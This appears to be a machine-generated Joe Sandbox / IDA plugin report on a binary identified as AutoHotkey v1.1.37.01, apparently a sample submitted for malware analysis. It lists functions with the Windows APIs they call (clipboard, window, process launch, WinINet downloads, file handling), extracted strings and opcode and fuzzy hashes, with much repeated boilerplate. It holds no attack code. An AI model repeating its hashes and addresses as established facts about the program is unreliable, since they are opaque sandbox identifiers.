Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Resource$Window$Load$Create$ClassShow$FindLockMenuMessageMetricsRegisterSendSystem$AcceleratorsCapsCursorDeviceEnableEnumFontForegroundFromIconItemLibraryLongNameNamesReleaseSizeof
String ID: AutoHotkey$AutoHotkey2$Consolas$CreateWindow$Lucida Console$P$RegClass$Shell_TrayWnd$edit
API String ID: 221421807-2636979444
Opcode ID: f3c3a200fbb3d90f0f5accd5d359caaea26f68e31acef48725077e7251a11005
Instruction ID: 113a3347b7f31ae7d4426fd89f3fc9adeb3451ee383df718cbdd0b9fc34b9b27
Opcode Fuzzy Hash: f3c3a200fbb3d90f0f5accd5d359caaea26f68e31acef48725077e7251a11005
Instruction Fuzzy Hash: 54C16B31218B8086E7668F22F8547DA73A4F78DB90F540115EB894BBB8DF3DC585CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140001ABC Relevance: 53.1, APIs: 29, Strings: 1, Instructions: 626timewindowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140001AED
CloseClipboard.USER32 ref: 0000000140001AFA
SetTimer.USER32 ref: 0000000140001BAA
GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A

Strings

#32770, xrefs: 0000000140002A49

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessageTimerUnlock
String ID: #32770
API String ID: 1115112458-463685578
Opcode ID: 7020c3aa795087f27f2b03cd4b81644c7e43635c03f437415a32140821466ec3
Instruction ID: 3274dae97a1d8aa058c99df919bdd8a1851e4649d4f653935e0fcef3d63b232c
Opcode Fuzzy Hash: 7020c3aa795087f27f2b03cd4b81644c7e43635c03f437415a32140821466ec3
Instruction Fuzzy Hash: B4527FB220568486FB67CB27B8543E937A1F78DBD8F184115EB4A07AB5DB78C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140041B60 Relevance: 53.1, APIs: 12, Strings: 18, Instructions: 597processlibraryloaderCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 0000000140042051
CloseHandle.KERNEL32 ref: 0000000140042064
GetLastError.KERNEL32 ref: 0000000140042090
SetCurrentDirectoryW.KERNEL32 ref: 00000001400421BD
GetFileAttributesW.KERNEL32 ref: 000000014004223F
SetCurrentDirectoryW.KERNEL32 ref: 000000014004229B
ShellExecuteExW.SHELL32 ref: 00000001400422B3
GetModuleHandleW.KERNEL32 ref: 00000001400422DC
GetProcAddress.KERNEL32 ref: 00000001400422EC
CloseHandle.KERNEL32 ref: 0000000140042360
GetLastError.KERNEL32 ref: 000000014004236E
FormatMessageW.KERNEL32 ref: 00000001400423C7

Strings

edit, xrefs: 0000000140041C4A, 0000000140041D60
Failed attempt to launch program or document:, xrefs: 000000014004246E
find, xrefs: 0000000140041C11, 0000000140041D27
\/., xrefs: 00000001400421F3
%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>, xrefs: 000000014004244D
String too long., xrefs: 0000000140041E71
kernel32.dll, xrefs: 00000001400422CF
Launch Error (possibly related to RunAs):, xrefs: 0000000140042446
System verbs unsupported with RunAs., xrefs: 0000000140041E2A
GetProcessId, xrefs: 00000001400422E2
"%s" %s, xrefs: 0000000140041F37
..., xrefs: 0000000140042401
Verb: <%s>, xrefs: 00000001400423D6
explore, xrefs: 0000000140041C24, 0000000140041D3A
.exe.bat.com.cmd.hta, xrefs: 0000000140042228
print, xrefs: 0000000140041C5D, 0000000140041D73
open, xrefs: 0000000140041C37, 0000000140041D4D
properties, xrefs: 0000000140041C70, 0000000140041D86, 00000001400420F5

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Handle$CloseCurrentDirectoryErrorLast$AddressAttributesCreateExecuteFileFormatMessageModuleProcProcessShell
String ID: Verb: <%s>$"%s" %s$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$...$.exe.bat.com.cmd.hta$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
API String ID: 187721205-2616667029
Opcode ID: eaaa51517441f1aee22f649f571258378f0e8d14f1603447bb328dac28ce8132
Instruction ID: b7a67ef56e51752d9ae6ef37dccc32c8dcda095b879cb4e90b84f9bf47c3da64
Opcode Fuzzy Hash: eaaa51517441f1aee22f649f571258378f0e8d14f1603447bb328dac28ce8132
Instruction Fuzzy Hash: BD428C72300B8095EB669F2398403E927A1FB8CBE8F854225FF1957BE9DB38C645C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140003286 Relevance: 48.0, APIs: 24, Strings: 3, Instructions: 747windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 000000014000335F
ScreenToClient.USER32 ref: 0000000140003375
SendMessageW.USER32 ref: 000000014000338A
GetWindowRect.USER32 ref: 00000001400033C7
MulDiv.KERNEL32 ref: 0000000140003515
GetWindowRect.USER32 ref: 0000000140003563

Part of subcall function 00000001400B1B90: free.LIBCMT ref: 00000001400B1C30

GetWindowRect.USER32 ref: 0000000140003687
GetWindowLongW.USER32 ref: 00000001400036AA
SetWindowLongW.USER32 ref: 00000001400036BF
MulDiv.KERNEL32 ref: 0000000140003759
MulDiv.KERNEL32 ref: 00000001400037A2
SendMessageW.USER32 ref: 0000000140003820
ShowWindow.USER32 ref: 0000000140003C7E
DragFinish.SHELL32 ref: 0000000140003CA4
GetWindowLongW.USER32 ref: 0000000140003CBA
SetWindowLongW.USER32 ref: 0000000140003CCF
free.LIBCMT ref: 0000000140003CE6

Strings

Out of memory., xrefs: 0000000140003B63
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014000395C
call, xrefs: 0000000140003C25

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Window$Long$MessageRectSend$free$ClientDragFinishScreenShow
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.$call
API String ID: 1298873099-3963558559
Opcode ID: 3dd19b711f2ae2d35ab0c1121cb385f87571d73cbc57190da53614e57cc86156
Instruction ID: 1dea8da7f045ac1a7919f1dfa015aca2cca17758a6ca17a18e6ba3ed4863953d
Opcode Fuzzy Hash: 3dd19b711f2ae2d35ab0c1121cb385f87571d73cbc57190da53614e57cc86156
Instruction Fuzzy Hash: 2872C0B2604A848AEB67CF26E4447ED37A9F74CBD8F554225EB4A47BB8DB38C540C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D2AC4 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 465
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__doserrno.LIBCMT ref: 00000001400D2B1A
_errno.LIBCMT ref: 00000001400D2B21
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D2B2C

Strings

U, xrefs: 00000001400D30A8

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: __doserrno_errno_invalid_parameter_noinfo
String ID: U
API String ID: 3902385426-4171548499
Opcode ID: 06413b1bd371d3dbb85101d0a98e85e343a0fb7330b48fab9a6da1f1a1ebab97
Instruction ID: 85f06c2c672a9a5319648f238344b69cc69f427f5d3ca7b7491bca8ea9af5a32
Opcode Fuzzy Hash: 06413b1bd371d3dbb85101d0a98e85e343a0fb7330b48fab9a6da1f1a1ebab97
Instruction Fuzzy Hash: 1712CF3221468586FB228F26E4443EEB7A1FB9DBD4F544116FB89476B4DB3DC446CB20

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007E490 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 230
networkfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcstoi64.LIBCMT ref: 000000014007E4F4
InternetOpenW.WININET ref: 000000014007E569
InternetOpenUrlW.WININET ref: 000000014007E58C
InternetCloseHandle.WININET ref: 000000014007E59D
InternetCloseHandle.WININET ref: 000000014007E5EC
InternetCloseHandle.WININET ref: 000000014007E5F5
InternetReadFile.WININET ref: 000000014007E666
GetTickCount.KERNEL32 ref: 000000014007E68D
PeekMessageW.USER32 ref: 000000014007E6BA
GetTickCount.KERNEL32 ref: 000000014007E6D1
InternetReadFile.WININET ref: 000000014007E709
InternetReadFileExA.WININET ref: 000000014007E72D
GetTickCount.KERNEL32 ref: 000000014007E74B
PeekMessageW.USER32 ref: 000000014007E778
GetTickCount.KERNEL32 ref: 000000014007E78F
InternetReadFileExA.WININET ref: 000000014007E7C8
InternetCloseHandle.WININET ref: 000000014007E7DB
InternetCloseHandle.WININET ref: 000000014007E7E4
fclose.LIBCMT ref: 000000014007E7ED
DeleteFileW.KERNEL32 ref: 000000014007E7F9

Strings

AutoHotkey, xrefs: 000000014007E553
*, xrefs: 000000014007E4D5
8, xrefs: 000000014007E604

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: Internet$CloseFileHandle$CountReadTick$MessageOpenPeek$Delete_wcstoi64fclose
String ID: *$8$AutoHotkey
API String ID: 338787218-1845633735
Opcode ID: c9981cc373f0a9db18ab43706371ba063c0c7d021de61666decf5073e7d38cad
Instruction ID: a1e9b980196a4065178655460da392e8d6f71c9f89ba9e3ba34c40b1ba1ad674
Opcode Fuzzy Hash: c9981cc373f0a9db18ab43706371ba063c0c7d021de61666decf5073e7d38cad
Instruction Fuzzy Hash: 3FA1A332205B8186F7A69B66E8507E977A1FB8DBD8F440021FF4957AA4EF3CC985C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D7010 Relevance: 39.6, APIs: 26, Instructions: 573fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00000001400D706D
__doserrno.LIBCMT ref: 00000001400D70B3
_errno.LIBCMT ref: 00000001400D70BD
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D70C9
__doserrno.LIBCMT ref: 00000001400D7217
_errno.LIBCMT ref: 00000001400D7221
_errno.LIBCMT ref: 00000001400D722C
CreateFileW.KERNEL32 ref: 00000001400D7262
CreateFileW.KERNEL32 ref: 00000001400D72B7
GetLastError.KERNEL32 ref: 00000001400D72E8
_errno.LIBCMT ref: 00000001400D72F5
GetFileType.KERNEL32 ref: 00000001400D7304
GetLastError.KERNEL32 ref: 00000001400D732F
CloseHandle.KERNEL32 ref: 00000001400D7342
_errno.LIBCMT ref: 00000001400D734C
_lseek_nolock.LIBCMT ref: 00000001400D73E0
__doserrno.LIBCMT ref: 00000001400D73ED
_lseek_nolock.LIBCMT ref: 00000001400D743D
_errno.LIBCMT ref: 00000001400D75B5
_lseek_nolock.LIBCMT ref: 00000001400D75D7
CloseHandle.KERNEL32 ref: 00000001400D7714
CreateFileW.KERNEL32 ref: 00000001400D7742
GetLastError.KERNEL32 ref: 00000001400D774E
_errno.LIBCMT ref: 00000001400D77D8
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D77E4

Part of subcall function 00000001400D34EC: CloseHandle.KERNEL32(?,?,00000000,00000001400D7401), ref: 00000001400D354B
Part of subcall function 00000001400D34EC: GetLastError.KERNEL32(?,?,00000000,00000001400D7401), ref: 00000001400D3555

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: _errno$ErrorFileLast$CloseCreateHandle__doserrno_lseek_nolock$_invalid_parameter_noinfo$Type_get_daylight
String ID:
API String ID: 6860575-0
Opcode ID: c8d7925bee072dc3ab2ae1d360aaa4655dc7e912142a973ee87aa6a5519d7f1a
Instruction ID: 634804dc47e32bf0624d2e58f39f0c912200e57a40b8577b2fc4312e8326443e
Opcode Fuzzy Hash: c8d7925bee072dc3ab2ae1d360aaa4655dc7e912142a973ee87aa6a5519d7f1a
Instruction Fuzzy Hash: C332F33671065086FB678B7AD450BEC36A1AB4C7E8F144615FF1A47BF5EB38C8428721

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000278B Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 447windowthreadCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000140001C7D
GetTickCount.KERNEL32 ref: 0000000140001CD8
GetMessageW.USER32 ref: 0000000140001D1B
GetTickCount.KERNEL32 ref: 0000000140001D2A
ShowWindow.USER32 ref: 00000001400028A0
GetForegroundWindow.USER32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.01,?,00000001400B5089), ref: 0000000140002A03
GetWindowThreadProcessId.USER32 ref: 0000000140002A1A
GetClassNameW.USER32 ref: 0000000140002A3C
IsDialogMessageW.USER32 ref: 0000000140002A7E
SetCurrentDirectoryW.KERNEL32(?,?,?,Unk,?,?,AutoHotkey v1.1.37.01,?,00000001400B5089), ref: 0000000140002AAE
DragFinish.SHELL32 ref: 00000001400030D3
GetTickCount.KERNEL32 ref: 00000001400031A1
wcsncpy.LIBCMT ref: 00000001400031C0
wcsncpy.LIBCMT ref: 00000001400031E5
wcsncpy.LIBCMT ref: 000000014000321F
GetTickCount.KERNEL32 ref: 0000000140003247

Strings

#32770, xrefs: 0000000140002A49

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$Windowwcsncpy$Message$ClassCurrentDialogDirectoryDragFinishForegroundNameProcessShowThread
String ID: #32770
API String ID: 1745663375-463685578
Opcode ID: b98e8406d395b4fa1adf5c47473018667ed2c76ace2146061bc20ed7ced74d64
Instruction ID: d01335d4f6662acdc231c1aad6069e277089882058ab4940c04144833fa784ea
Opcode Fuzzy Hash: b98e8406d395b4fa1adf5c47473018667ed2c76ace2146061bc20ed7ced74d64
Instruction Fuzzy Hash: AB2290B2605A908AFB67CF27A8547E937A4F78DBD8F144115EB8A17BB4DB34C881C710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400358E6 Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 468windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
free.LIBCMT ref: 0000000140035CBB
malloc.LIBCMT ref: 0000000140035CD1

Strings

Out of memory., xrefs: 0000000140035D23
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140035B22

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlockfreemalloc
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 720627891-457448710
Opcode ID: f13765f806a90751c36c1ff3cef502a61cf87c10dc81b34f37026fb700e49095
Instruction ID: 9fd40459b66eb6a889fc60882920b7c6ea233aa423442a16044e72b577a57c96
Opcode Fuzzy Hash: f13765f806a90751c36c1ff3cef502a61cf87c10dc81b34f37026fb700e49095
Instruction Fuzzy Hash: D2229B32204B408AFB679B27E4543EA67A2F74DBD4F544216EB5A47BF9DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400337DF Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 459windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00000001400325E1
CloseClipboard.USER32 ref: 00000001400325EE
GetTickCount.KERNEL32 ref: 0000000140032601
PeekMessageW.USER32 ref: 0000000140032635
GetTickCount.KERNEL32 ref: 0000000140032649
GetTickCount.KERNEL32 ref: 0000000140032717
_wcstoi64.LIBCMT ref: 0000000140033A69
free.LIBCMT ref: 0000000140033B44
free.LIBCMT ref: 0000000140033B7A

Strings

D, xrefs: 000000014003391E

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: CountTick$free$ClipboardCloseGlobalMessagePeekUnlock_wcstoi64
String ID: D
API String ID: 2580995969-2746444292
Opcode ID: 7e874d8fd1f0582d017fdbdbc363c6ec15b362b52b26484db3f67cc13263c7b0
Instruction ID: d39ea2a658c4a7b38ae67528f92b5afed482653ad331f6357d27c8b36908dc66
Opcode Fuzzy Hash: 7e874d8fd1f0582d017fdbdbc363c6ec15b362b52b26484db3f67cc13263c7b0
Instruction Fuzzy Hash: B4226C32605B448AFB67CB67D8803EE67A1F78DBD4F540116EB8A57AB5DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140032C68 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 476COMMON

Download Yara Rule

Strings

Parameter #2 invalid., xrefs: 0000000140038B65
Parameter #3 invalid., xrefs: 0000000140038B45
Read, xrefs: 0000000140032CCF

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Parameter #2 invalid.$Parameter #3 invalid.$Read
API String ID: 0-931347957
Opcode ID: 79645b44cacc5452333a743317421d58383a3d6be94c6bca093b60535f45133a
Instruction ID: 3285ffaee158f80f97cae7e5d10421a824c51a5b1f885021f6b4bbf5dd29bac8
Opcode Fuzzy Hash: 79645b44cacc5452333a743317421d58383a3d6be94c6bca093b60535f45133a
Instruction Fuzzy Hash: 6F224B36605B508AFB678B2BE8407EE27A1F74CBD4F554126EF4947AB8DB38C881C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B2650 Relevance: 15.1, APIs: 10, Instructions: 145
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowThreadProcessId.USER32 ref: 00000001400B266D

Memory Dump Source

Source File: 00000000.00000002.3329258087.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.3329215813.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329330494.00000001400F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.0000000140112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329421279.000000014011B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329447240.000000014011F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329466667.0000000140127000.00000010.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3329500660.000000014012A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd

Similarity

API ID: ProcessThreadWindow
String ID:
API String ID: 1653199695-0
Opcode ID: 258fbb36bc0d8241f5f30e30395a32fa73bc28745546f37e110b1db5dd89fe0e
Instruction ID: e443d94edaeacfae671461fea15a2ec7f5c32c0642453533ab5af42f8fd6eb74
Opcode Fuzzy Hash: 258fbb36bc0d8241f5f30e30395a32fa73bc28745546f37e110b1db5dd89fe0e
Instruction Fuzzy Hash: F2518C31704A4186FA669F67B8107AB67B1BB8DBD4F581024BF4A5BBB5DE3DC881C700

Uniqueness

Uniqueness Score: -1.00%

